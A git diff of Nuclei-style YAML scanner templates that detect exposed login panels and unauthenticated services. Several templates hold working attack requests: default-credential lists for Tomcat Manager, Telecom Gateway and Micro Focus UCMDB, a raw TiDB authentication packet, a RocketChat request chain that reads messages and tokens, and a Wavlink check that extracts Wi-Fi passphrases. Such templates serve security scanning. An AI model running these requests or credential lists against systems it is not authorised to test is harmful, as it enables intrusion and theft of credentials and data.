diff --git a/poc/auth/symantec-epm-login-10601.yaml b/poc/auth/symantec-epm-login-10599.yaml
similarity index 100%
rename from poc/auth/symantec-epm-login-10601.yaml
rename to poc/auth/symantec-epm-login-10599.yaml
diff --git a/poc/auth/symantec-ewep-login-10605.yaml b/poc/auth/symantec-ewep-login-10605.yaml
index ba70fd514b..2427730b89 100644
--- a/poc/auth/symantec-ewep-login-10605.yaml
+++ b/poc/auth/symantec-ewep-login-10605.yaml
@@ -1,25 +1,20 @@
id: symantec-ewep-login
-
info:
name: Symantec Encryption Web Email Protection
author: johnk3r
severity: info
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22
+ reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22
tags: panel,symantec,login
-
requests:
- method: GET
path:
- "{{BaseURL}}/b/l.e"
-
matchers-condition: and
matchers:
- type: word
words:
- "Symantec Encryption Server: Web Email Protection - Login"
part: body
-
- type: status
status:
- 200
diff --git a/poc/auth/symantec-ewep-login-10606.yaml b/poc/auth/symantec-ewep-login-10606.yaml
index 2427730b89..835a5f9663 100644
--- a/poc/auth/symantec-ewep-login-10606.yaml
+++ b/poc/auth/symantec-ewep-login-10606.yaml
@@ -3,7 +3,8 @@ info:
name: Symantec Encryption Web Email Protection
author: johnk3r
severity: info
- reference: https://www.shodan.io/search?query=http.title%3A%22Symantec+Encryption+Server%3A+Web+Email+Protection+-+Login%22
+ metadata:
+ shodan-query: http.title:"Symantec Encryption Server"
tags: panel,symantec,login
requests:
- method: GET
diff --git a/poc/auth/szhe-default-login-10636.yaml b/poc/auth/szhe-default-login-10636.yaml
index 64f4525692..261f6d9060 100644
--- a/poc/auth/szhe-default-login-10636.yaml
+++ b/poc/auth/szhe-default-login-10636.yaml
@@ -2,10 +2,16 @@ id: szhe-default-login
info:
name: Szhe Default Login
author: pikpikcu
- severity: low
+ description: Szhe default login information was discovered.
+ severity: medium
tags: szhe,default-login
reference:
- https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N
+ cvss-score: 5.8
+ cve-id:
+ cwe-id: CWE-522
requests:
- raw:
- |
@@ -32,3 +38,5 @@ requests:
- type: status
status:
- 302
+
+# Enhanced by mp on 2022/03/11
diff --git a/poc/auth/szhe-default-login.yaml b/poc/auth/szhe-default-login-10638.yaml
similarity index 100%
rename from poc/auth/szhe-default-login.yaml
rename to poc/auth/szhe-default-login-10638.yaml
diff --git a/poc/auth/telecom-gateway-default-login-10686.yaml b/poc/auth/telecom-gateway-default-login-10686.yaml
index 73abc6eada..08f2ecd266 100644
--- a/poc/auth/telecom-gateway-default-login-10686.yaml
+++ b/poc/auth/telecom-gateway-default-login-10686.yaml
@@ -1,15 +1,12 @@
id: telecom-gateway-default-login
info:
- name: Telecom Gateway - Default Admin Login
+ name: Telecom Gateway Default Login
author: ritikchaddha
severity: high
- description: Telecom Gateway default admin login credentials were successful.
- metadata:
- max-request: 1
- tags: default-login,telecom,gateway
+ tags: telecom,default-login,gateway
-http:
+requests:
- raw:
- |
POST /manager/login.php HTTP/1.1
@@ -23,9 +20,8 @@ http:
- admin
password:
- admin
- host-redirects: true
+ redirects: true
max-redirects: 2
-
matchers-condition: and
matchers:
- type: word
@@ -39,5 +35,3 @@ http:
- type: status
status:
- 200
-
-# digest: 4a0a00473045022100a367ccbfabd23210af96b3439c4ba6cbe08f9800ae62553ccd130828136642480220114c4652ae60ed84e6ae4c520992c75d8e25f826fd02f172fcc9e416309fe566:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/telecom-gateway-default-login.yaml b/poc/auth/telecom-gateway-default-login.yaml
new file mode 100644
index 0000000000..d0730e1ba5
--- /dev/null
+++ b/poc/auth/telecom-gateway-default-login.yaml
@@ -0,0 +1,33 @@
+id: telecom-gateway-default-login
+info:
+ name: Telecom Gateway Default Login
+ author: ritikchaddha
+ severity: high
+ tags: telecom,default-login,gateway
+requests:
+ - raw:
+ - |
+ POST /manager/login.php HTTP/1.1
+ Host: {{Hostname}}
+
+ Name={{username}}&Pass={{password}}
+ attack: pitchfork
+ payloads:
+ username:
+ - admin
+ password:
+ - admin
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "电信网关服务器管理后台"
+ - "index-shang.php"
+ - "di.php"
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/tidb-unauth-10770.yaml b/poc/auth/tidb-unauth-10770.yaml
new file mode 100644
index 0000000000..c4c6a133b8
--- /dev/null
+++ b/poc/auth/tidb-unauth-10770.yaml
@@ -0,0 +1,23 @@
+id: tidb-unauth
+info:
+ name: Unauth TiDB Disclosure
+ author: lu4nx
+ severity: high
+ metadata:
+ zoomeye-dork: tidb +port:"4000"
+ tags: network,tidb,unauth
+network:
+ - inputs:
+ - read: 1024 # skip handshake packet
+ - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication
+ type: hex
+ host:
+ - "{{Hostname}}"
+ - "{{Host}}:4000"
+ read-size: 1024
+ matchers:
+ - type: binary
+ binary:
+ # resp format:
+ # 07: length, 02: sequence number, 00: success
+ - "0700000200000002000000"
diff --git a/poc/auth/tidb-unauth-10772.yaml b/poc/auth/tidb-unauth-10772.yaml
deleted file mode 100644
index 8121309890..0000000000
--- a/poc/auth/tidb-unauth-10772.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: tidb-unauth
-info:
- name: TiDB - Unauthenticated Access
- author: lu4nx
- severity: high
- description: TiDB server was able to be accessed because no authentication was required.
- metadata:
- zoomeye-dork: tidb +port:"4000"
- tags: network,tidb,unauth
-network:
- - inputs:
- - read: 1024 # skip handshake packet
- - data: b200000185a6ff0900000001ff0000000000000000000000000000000000000000000000726f6f7400006d7973716c5f6e61746976655f70617373776f72640075045f70696406313337353030095f706c6174666f726d067838365f3634035f6f73054c696e75780c5f636c69656e745f6e616d65086c69626d7973716c076f735f757365720578787878780f5f636c69656e745f76657273696f6e06382e302e32360c70726f6772616d5f6e616d65056d7973716c # authentication
- type: hex
- host:
- - "{{Hostname}}"
- - "{{Host}}:4000"
- read-size: 1024
- matchers:
- - type: binary
- binary:
- # resp format:
- # 07: length, 02: sequence number, 00: success
- - "0700000200000002000000"
-
-# Enhanced by mp on 2022/07/20
diff --git a/poc/auth/tomcat-default-login-10791.yaml b/poc/auth/tomcat-default-login-10791.yaml
index 4e522c9229..514e77dbe1 100644
--- a/poc/auth/tomcat-default-login-10791.yaml
+++ b/poc/auth/tomcat-default-login-10791.yaml
@@ -1,6 +1,6 @@
id: tomcat-default-login
info:
- name: ApahceTomcat Manager Default Login
+ name: Apache Tomcat Manager Default Login
author: pdteam
severity: high
description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
diff --git a/poc/auth/tomcat-default-login.yaml b/poc/auth/tomcat-default-login.yaml
new file mode 100644
index 0000000000..662fd6f3ac
--- /dev/null
+++ b/poc/auth/tomcat-default-login.yaml
@@ -0,0 +1,76 @@
+id: tomcat-default-login
+
+info:
+ name: Apache Tomcat Manager Default Login
+ author: pdteam
+ severity: high
+ description: Apache Tomcat Manager default login credentials were discovered. This template checks for multiple variations.
+ reference:
+ - https://www.rapid7.com/db/vulnerabilities/apache-tomcat-default-ovwebusr-password/
+ tags: tomcat,apache,default-login
+
+requests:
+ - raw:
+ - |
+ GET /manager/html HTTP/1.1
+ Host: {{Hostname}}
+ Authorization: Basic {{base64(username + ':' + password)}}
+
+ payloads:
+ username:
+ - tomcat
+ - admin
+ - ovwebusr
+ - j2deployer
+ - cxsdk
+ - ADMIN
+ - xampp
+ - tomcat
+ - QCC
+ - admin
+ - root
+ - role1
+ - role
+ - tomcat
+ - admin
+ - role1
+ - both
+ - admin
+
+ password:
+ - tomcat
+ - admin
+ - OvW*busr1
+ - j2deployer
+ - kdsxc
+ - ADMIN
+ - xampp
+ - s3cret
+ - QLogic66
+ - tomcat
+ - root
+ - role1
+ - changethis
+ - changethis
+ - j5Brn9
+ - tomcat
+ - tomcat
+ - 123456
+
+ attack: pitchfork # Available options: sniper, pitchfork and clusterbomb
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Apache Tomcat"
+ - "Server Information"
+ - "Hostname"
+ condition: and
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/03/03
diff --git a/poc/auth/tracer-sc-login.yaml b/poc/auth/tracer-sc-login.yaml
index 41c01692f2..ebe33fde3a 100644
--- a/poc/auth/tracer-sc-login.yaml
+++ b/poc/auth/tracer-sc-login.yaml
@@ -1,23 +1,38 @@
id: tracer-sc-login
+
info:
- name: Tracer SC login panel
+ name: Tracer SC Login Panel - Detect
author: geeknik
severity: info
- reference: https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html
+ description: Tracer SC login panel was detected.
+ reference:
+ - https://www.trane.com/commercial/north-america/us/en/products-systems/building-management---automation/building-automation-systems/tracer-sc-plus.html
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
+ cvss-score: 0
+ cwe-id: CWE-200
+ metadata:
+ max-request: 1
tags: tracer,trane,iot,panel,login
-requests:
+
+http:
- method: GET
path:
- "{{BaseURL}}/hui/index.html"
+
matchers-condition: and
matchers:
- type: status
status:
- 200
+
- type: word
words:
- "Tracer SC"
+
- type: word
part: header
words:
- "text/html"
+
+# digest: 490a004630440220586e31fea6c6370b8cdbbfedfd72de8617dd9df5dec16bd17631e3ffb4cc4f380220365b54fb1158abdf005462f86436a7f98171342b816a494be549d6fd2efba4a5:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/twitter-secret-10862.yaml b/poc/auth/twitter-secret-10862.yaml
index 713cfd3069..824660405a 100644
--- a/poc/auth/twitter-secret-10862.yaml
+++ b/poc/auth/twitter-secret-10862.yaml
@@ -1,7 +1,7 @@
id: twitter-secret
info:
name: Twitter Secret
- author: gaurang
+ author: gaurang,daffainfo
severity: medium
tags: token,file,twitter
file:
@@ -11,3 +11,4 @@ file:
- type: regex
regex:
- "(?i)twitter(.{0,20})?[0-9a-z]{35,44}"
+ - "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}"
diff --git a/poc/auth/twitter-secret.yaml b/poc/auth/twitter-secret.yaml
index 824660405a..0a89da00fa 100644
--- a/poc/auth/twitter-secret.yaml
+++ b/poc/auth/twitter-secret.yaml
@@ -1,4 +1,5 @@
id: twitter-secret
+
info:
name: Twitter Secret
author: gaurang,daffainfo
@@ -7,8 +8,11 @@ info:
file:
- extensions:
- all
+
extractors:
- type: regex
regex:
- "(?i)twitter(.{0,20})?[0-9a-z]{35,44}"
- "(?i)twitter(.{0,20})?['\"][0-9a-z]{35,44}"
+
+# digest: 4a0a00473045022100d0efec25fa4880fa1dcfdbb4303fc8bfeaddf4e62c15395ce9d0443c2d773e9702202bbf2fbd6b1be33572a5fa33d3a51876ae77d10a60a6474ff61bde7f6cdd3498:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/ucmdb-default-login-10868.yaml b/poc/auth/ucmdb-default-login-10868.yaml
index 7f92b3251a..169611f6d5 100644
--- a/poc/auth/ucmdb-default-login-10868.yaml
+++ b/poc/auth/ucmdb-default-login-10868.yaml
@@ -4,8 +4,7 @@ info:
name: Micro Focus Universal CMDB Default Login
author: dwisiswant0
severity: high
- description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853
- and CVE-2020-11854.
+ description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853 and CVE-2020-11854.
reference:
- https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
classification:
diff --git a/poc/auth/ucmdb-default-login-10871.yaml b/poc/auth/ucmdb-default-login-10871.yaml
new file mode 100644
index 0000000000..7f92b3251a
--- /dev/null
+++ b/poc/auth/ucmdb-default-login-10871.yaml
@@ -0,0 +1,41 @@
+id: ucmdb-default-login
+
+info:
+ name: Micro Focus Universal CMDB Default Login
+ author: dwisiswant0
+ severity: high
+ description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853
+ and CVE-2020-11854.
+ reference:
+ - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
+ classification:
+ cwe-id: CWE-798
+ tags: ucmdb,default-login
+
+requests:
+ - raw:
+ - |
+ POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
+ Host: {{Hostname}}
+
+ customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB
+
+ attack: pitchfork
+ payloads:
+ username:
+ - diagnostics
+ password:
+ - admin
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - "LWSSO_COOKIE_KEY"
+
+# Enhanced by mp on 2022/03/07
diff --git a/poc/auth/ucmdb-default-login-10869.yaml b/poc/auth/ucmdb-default-login.yaml
similarity index 100%
rename from poc/auth/ucmdb-default-login-10869.yaml
rename to poc/auth/ucmdb-default-login.yaml
diff --git a/poc/auth/unauth-ftp-10939.yaml b/poc/auth/unauth-ftp-10939.yaml
index e3c21171fa..4e68ffae34 100644
--- a/poc/auth/unauth-ftp-10939.yaml
+++ b/poc/auth/unauth-ftp-10939.yaml
@@ -1,23 +1,18 @@
id: unauth-ftp
-
info:
name: FTP Anonymous Login
- author: C3l3si4n
+ author: Celesian ( @C3l3si4n )
severity: medium
- reference:
- - https://tools.ietf.org/html/rfc2577
+ reference: https://tools.ietf.org/html/rfc2577
tags: network,ftp
-
network:
- inputs:
- data: "USER anonymous\r\nPASS nuclei\r\n"
-
host:
- - "{{Host}}:21"
- "{{Hostname}}"
-
+ - "{{Hostname}}:21"
matchers:
- type: word
words:
- "Anonymous access allowed,"
- part: response
\ No newline at end of file
+ part: all
diff --git a/poc/auth/unauth-ftp-10942.yaml b/poc/auth/unauth-ftp-10942.yaml
deleted file mode 100644
index 12d9dba01b..0000000000
--- a/poc/auth/unauth-ftp-10942.yaml
+++ /dev/null
@@ -1,18 +0,0 @@
-id: unauth-ftp
-info:
- name: FTP Anonymous Login
- author: C3l3si4n
- severity: medium
- reference: https://tools.ietf.org/html/rfc2577
- tags: network,ftp
-network:
- - inputs:
- - data: "USER anonymous\r\nPASS nuclei\r\n"
- host:
- - "{{Host}}:21"
- - "{{Hostname}}"
- matchers:
- - type: word
- words:
- - "Anonymous access allowed,"
- part: all
diff --git a/poc/auth/unauth-hoteldruid-panel-10943.yaml b/poc/auth/unauth-hoteldruid-panel-10943.yaml
deleted file mode 100644
index c30b9ab48e..0000000000
--- a/poc/auth/unauth-hoteldruid-panel-10943.yaml
+++ /dev/null
@@ -1,39 +0,0 @@
-id: unauth-hoteldruid-panel
-
-info:
- name: Hoteldruid Management Panel Access
- author: princechaddha
- severity: high
- description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
- reference:
- - https://github.com/nomi-sec/PoC-in-GitHub/blob/master/2021/CVE-2021-42949.json
- - https://www.hoteldruid.com/
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
- cvss-score: 8.3
- cwe-id: CWE-522
- metadata:
- max-request: 2
- tags: hoteldruid,panel,unauth
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/hoteldruid/inizio.php"
- - "{{BaseURL}}/inizio.php"
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- part: body
- words:
- - " HotelDruid "
- - "INSERT:"
- - "TABLES:"
- condition: and
-
-# digest: 4b0a00483046022100b167cc0851722d7c32a687f0349ff4aeb493bfa181a2bafa03726b549b68c194022100a9e8558089ffe0f9a1b3900510ed9a46ed69d19f65e2e77f076e8dae01f1410a:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauth-hoteldruid-panel.yaml b/poc/auth/unauth-hoteldruid-panel.yaml
new file mode 100644
index 0000000000..9897bff31a
--- /dev/null
+++ b/poc/auth/unauth-hoteldruid-panel.yaml
@@ -0,0 +1,25 @@
+id: unauth-hoteldruid-panel
+info:
+ name: Unauthenticated Hoteldruid Panel
+ author: princechaddha
+ severity: high
+ description: A vulnerability in Hoteldruid Panel allows remote unauthenticated users access to the management portal without authentication.
+ reference: https://www.hoteldruid.com/
+ tags: hoteldruid,panel,unauth
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/hoteldruid/inizio.php"
+ - "{{BaseURL}}/inizio.php"
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ part: body
+ words:
+ - " HotelDruid "
+ - "INSERT:"
+ - "TABLES:"
+ condition: and
diff --git a/poc/auth/unauth-message-read-10947.yaml b/poc/auth/unauth-message-read-10947.yaml
index 5f53cf4e40..81cd8e1c7b 100644
--- a/poc/auth/unauth-message-read-10947.yaml
+++ b/poc/auth/unauth-message-read-10947.yaml
@@ -1,13 +1,26 @@
id: rocketchat-unauth-access
+
info:
- name: RocketChat Unauthenticated Read Access
+ name: RocketChat Live Chat - Unauthenticated Read Access
author: rojanrijal
- severity: critical
- description: An issue with the Live Chat accepting invalid parameters could potentially allow unauthenticated access to messages and user tokens.
+ severity: high
+ description: RocketChat Live Chat accepts invalid parameters that could potentially allow unauthenticated access to messages and user tokens.
+ remediation: Fixed in versions 3.11, 3.10.5, 3.9.7, and 3.8.8.
reference:
- https://docs.rocket.chat/guides/security/security-updates
+ - https://securifyinc.com/disclosures/rocketchat-unauthenticated-access-to-messages
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
+ cvss-score: 8.6
+ cwe-id: CWE-522
+ metadata:
+ max-request: 2
tags: rocketchat,unauth
-requests:
+variables:
+ value: "{{to_lower(rand_text_alpha(5))}}"
+ user_email: "{{username}}@{{to_lower(rand_text_alphanumeric(6))}}.com"
+
+http:
- raw:
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
@@ -16,22 +29,26 @@ requests:
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
- {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"name\":\"cve-2020-nuclei\",\"email\":\"cve@nuclei.local\"}],\"id\":\"123\"}"}
+ {"message":"{\"msg\":\"method\",\"method\":\"livechat:registerGuest\",\"params\":[{\"token\":\"{{value}}\",\"name\":\"cve-2020-{{value}}\",\"email\":\"{{user_email}}\"}],\"id\":\"123\"}"}
- |
POST /api/v1/method.callAnon/cve_exploit HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
Content-Type: application/json
- {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"cvenucleirocketchat\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
+ {"message":"{\"msg\":\"method\",\"method\":\"livechat:loadHistory\",\"params\":[{\"token\":\"{{value}}\",\"rid\":\"GENERAL\"}],\"msg\":\"123\"}"}
+
matchers-condition: and
matchers:
- - type: status
- status:
- - 200
- type: word
+ part: body
words:
- '"{\"msg\":\"result\",\"result\":{\"messages\"'
- '"success":true'
- part: body
condition: and
+
+ - type: status
+ status:
+ - 200
+
+# digest: 4b0a0048304602210095085dc96a7cb508eefb70fb2096b11370550b5fc48bf2778a9fe85c1c1d2726022100e82787c9db9e4546b785b8bd5997137083fc5de11cfbde2b2f1b775a62ef1ce2:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauth-spark-api-10963.yaml b/poc/auth/unauth-spark-api-10963.yaml
index 504318c39a..5575a73ff9 100644
--- a/poc/auth/unauth-spark-api-10963.yaml
+++ b/poc/auth/unauth-spark-api-10963.yaml
@@ -3,26 +3,30 @@ id: unauth-spark-api
info:
name: Unauthenticated Spark REST API
author: princechaddha
- severity: medium
+ severity: critical
description: The Spark product's REST API interface allows access to unauthenticated users.
+ remediation: Restrict access the exposed API ports.
reference:
- https://xz.aliyun.com/t/2490
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
+ cvss-score: 10
cwe-id: CWE-77
- remediation: Restrict access the exposed API ports.
+ metadata:
+ max-request: 1
tags: spark,unauth
-requests:
+http:
- method: GET
path:
- "{{BaseURL}}/v1/submissions"
+
matchers-condition: and
matchers:
- type: status
status:
- 400
+
- type: word
words:
- "Missing an action"
@@ -30,4 +34,4 @@ requests:
part: body
condition: and
-# Enhanced by cs on 2022/02/28
+# digest: 4a0a00473045022018b659baec610f87c26890d0fb5845caeb74f982b891f1d7962fc76f1cc74819022100fbbd51799d7374a2ec8d0ce526872a8541093e2d98a549188fca7c8890f25681:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauth-spark-api.yaml b/poc/auth/unauth-spark-api.yaml
deleted file mode 100644
index 2025d7145b..0000000000
--- a/poc/auth/unauth-spark-api.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: unauth-spark-api
-info:
- name: Unauthenticated Spark REST API
- author: princechaddha
- severity: medium
- description: The Spark product's REST API interface allows access to unauthenticated users.
- remediation: Restrict access the exposed API ports.
- reference: https://xz.aliyun.com/t/2490
- tags: spark,unauth
- classification:
- cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- cvss-score: 10.0
- cwe-id: CWE-77
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/v1/submissions"
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 400
- - type: word
- words:
- - "Missing an action"
- - "serverSparkVersion"
- part: body
- condition: and
-
-# Enhanced by cs on 2022/02/28
diff --git a/poc/auth/unauth-wavink-panel-10967.yaml b/poc/auth/unauth-wavink-panel-10967.yaml
new file mode 100644
index 0000000000..3a38b04d8e
--- /dev/null
+++ b/poc/auth/unauth-wavink-panel-10967.yaml
@@ -0,0 +1,48 @@
+id: unauth-wavink-panel
+
+info:
+ name: Wavlink Panel - Unauthenticated Access
+ author: princechaddha
+ severity: high
+ description: Wavlink Panel was able to be accessed with no authentication requirements in place.
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: http.title:"Wi-Fi APP Login"
+ tags: exposure,wavlink,unauth,misconfig,router
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wifi_base.shtml"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "APP"
+
+ - type: regex
+ part: body
+ regex:
+ - 'var passphraseKey12="(.*)";'
+
+ - type: word
+ part: body
+ negative: true
+ words:
+ - 'var passphraseKey12="";'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'var passphraseKey12="(.*)";'
+
+# digest: 4a0a00473045022001a73c92e30b7d3d758141d3c02a0556b645c3db302df3ec3d4cdcc924c4a9d70221009cb70454a96ce29bd3cbd76b6c13e1c5d16ec80883c57b37e6178534b653a869:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauth-xproxy-dashboard-10968.yaml b/poc/auth/unauth-xproxy-dashboard-10968.yaml
deleted file mode 100644
index c7d01f13ff..0000000000
--- a/poc/auth/unauth-xproxy-dashboard-10968.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: unauth-xproxy-dashboard
-info:
- name: X-Proxy Dashboard Detect
- author: pussycat0x
- severity: high
- metadata:
- fofa-dork: "X-Proxy Dashboard"
- tags: xproxy,panel
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - 'X-Proxy'
- - 'Dashboard'
- condition: and
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauth-xproxy-dashboard-10969.yaml b/poc/auth/unauth-xproxy-dashboard-10969.yaml
new file mode 100644
index 0000000000..2e76185f13
--- /dev/null
+++ b/poc/auth/unauth-xproxy-dashboard-10969.yaml
@@ -0,0 +1,27 @@
+id: unauth-xproxy-dashboard
+
+info:
+ name: X-Proxy Dashboard Detect
+ author: pussycat0x
+ severity: high
+ metadata:
+ fofa-dork: "X-Proxy Dashboard"
+ tags: xproxy,panel
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - 'X-Proxy'
+ - 'Dashboard'
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauth-xproxy-dashboard.yaml b/poc/auth/unauth-xproxy-dashboard.yaml
index 2e76185f13..c7d01f13ff 100644
--- a/poc/auth/unauth-xproxy-dashboard.yaml
+++ b/poc/auth/unauth-xproxy-dashboard.yaml
@@ -1,5 +1,4 @@
id: unauth-xproxy-dashboard
-
info:
name: X-Proxy Dashboard Detect
author: pussycat0x
@@ -7,12 +6,10 @@ info:
metadata:
fofa-dork: "X-Proxy Dashboard"
tags: xproxy,panel
-
requests:
- method: GET
path:
- "{{BaseURL}}"
-
matchers-condition: and
matchers:
- type: word
@@ -21,7 +18,6 @@ requests:
- 'X-Proxy'
- 'Dashboard'
condition: and
-
- type: status
status:
- 200
diff --git a/poc/auth/unauthenticated-airflow-10884.yaml b/poc/auth/unauthenticated-airflow-10884.yaml
new file mode 100644
index 0000000000..50ca17d92a
--- /dev/null
+++ b/poc/auth/unauthenticated-airflow-10884.yaml
@@ -0,0 +1,27 @@
+id: unauthenticated-airflow-instance
+
+info:
+ name: Unauthenticated Airflow Instance
+ author: dhiyaneshDK
+ severity: high
+ tags: apache,airflow,unauth
+ metadata:
+ shodan-query: title:"Airflow - DAGs"
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+ - "{{BaseURL}}/admin/"
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Airflow - DAGs"
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/auth/unauthenticated-airflow-10886.yaml b/poc/auth/unauthenticated-airflow-10886.yaml
deleted file mode 100644
index afe4ed1f3c..0000000000
--- a/poc/auth/unauthenticated-airflow-10886.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: unauthenticated-airflow-instance
-info:
- name: Unauthenticated Airflow Instance
- author: dhiyaneshDK
- severity: high
- metadata:
- shodan-query: title:"Airflow - DAGs"
- tags: apache,airflow,unauth
-requests:
- - method: GET
- path:
- - "{{BaseURL}}"
- - "{{BaseURL}}/admin/"
- stop-at-first-match: true
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "Airflow - DAGs"
- - type: status
- status:
- - 200
diff --git a/poc/auth/unauthenticated-airflow.yaml b/poc/auth/unauthenticated-airflow.yaml
index 93eb15068c..afe4ed1f3c 100644
--- a/poc/auth/unauthenticated-airflow.yaml
+++ b/poc/auth/unauthenticated-airflow.yaml
@@ -1,31 +1,23 @@
id: unauthenticated-airflow-instance
-
info:
name: Unauthenticated Airflow Instance
author: dhiyaneshDK
severity: high
metadata:
- max-request: 2
shodan-query: title:"Airflow - DAGs"
- tags: apache,airflow,unauth,misconfig
-
-http:
+ tags: apache,airflow,unauth
+requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/admin/"
-
stop-at-first-match: true
-
matchers-condition: and
matchers:
- type: word
part: body
words:
- "Airflow - DAGs"
-
- type: status
status:
- 200
-
-# digest: 4a0a004730450221008ff04d74351dc40542a499d88517999e66dc8504d16a8fa83df765ab850de2cc0220093c9335dd06ec425df7afb41e2306101fb637e6c30106c02891f8c001e7e805:922c64590222798bb761d5b6d8e72950
diff --git a/poc/auth/unauthenticated-alert-manager-10888.yaml b/poc/auth/unauthenticated-alert-manager-10888.yaml
index e1036fc73c..b6de2aadd0 100644
--- a/poc/auth/unauthenticated-alert-manager-10888.yaml
+++ b/poc/auth/unauthenticated-alert-manager-10888.yaml
@@ -3,8 +3,7 @@ info:
name: Unauthenticated Alert Manager
author: dhiyaneshDK
severity: high
- reference:
- - https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22
+ reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22
tags: unauth,alertmanager
requests:
- method: GET
diff --git a/poc/auth/unauthenticated-alert-manager-10892.yaml b/poc/auth/unauthenticated-alert-manager-10892.yaml
deleted file mode 100644
index f4b978d825..0000000000
--- a/poc/auth/unauthenticated-alert-manager-10892.yaml
+++ /dev/null
@@ -1,23 +0,0 @@
-id: unauthenticated-alert-manager
-
-info:
- name: Unauthenticated Alert Manager
- author: dhiyaneshDK
- severity: high
- reference: https://www.shodan.io/search?query=http.title%3A%22Alertmanager%22
- tags: unauth,alertmanager
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/#/alerts"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - 'Alertmanager'
-
- - type: status
- status:
- - 200
